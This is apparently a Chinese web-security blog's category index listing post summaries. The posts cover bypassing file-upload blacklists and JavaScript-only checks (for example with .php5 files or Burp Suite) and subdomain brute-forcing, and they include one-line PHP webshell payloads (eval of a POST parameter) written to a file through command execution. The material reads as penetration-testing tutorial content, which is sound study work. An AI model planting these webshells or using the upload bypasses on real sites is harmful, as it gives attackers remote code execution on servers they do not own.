随笔分类 - Web安全
文件上传漏洞之黑名单验证
摘要:pass-03 只禁止了部分扩展名,还有.php5等扩展名可以解析为PHP。 上传.php5即可。 类似的扩展名有:php2,php3、php4、php5、phtml、等
命令执行写马的正确方式
摘要:Windows 错误写马 正确姿势 echo ^<?php @eval($_POST[cmd]);?^> > ./iii.txt Linux 正确写马方式 echo "<?php @eval(\$_POST['cmd']); ?>" > ./1.php
无状态子域名爆破工具:ksubdomain
摘要:概述 开源地址:https://github.com/knownsec/ksubdomain 二进制文件下载:https://github.com/knownsec/ksubdomain/releases 在linux下,还需要安装libpcap-dev,在Windows下需要安装WinPcap,m
文件上传漏洞之js验证
摘要:0x00 前言 只有前端验证=没有验证 0x01 剔除JS 打开burpsuite,进入Proxy的Options,把Remove all JavaScript选上。 设置浏览器代理直接上传PHP木马即可。 0x02 上传截断修改扩展名 把PHP木马修改为jpg格式,然后上传,用burpsuite截
burpsuite常见问题
摘要:burpsuite,无法抓取HTTPS的包,无法抓取本地或局域网其他主机的包,SQL注入测试时出现500错误,但是在浏览器中是正常的,经过burpsuite无法上网,取消代理就正常
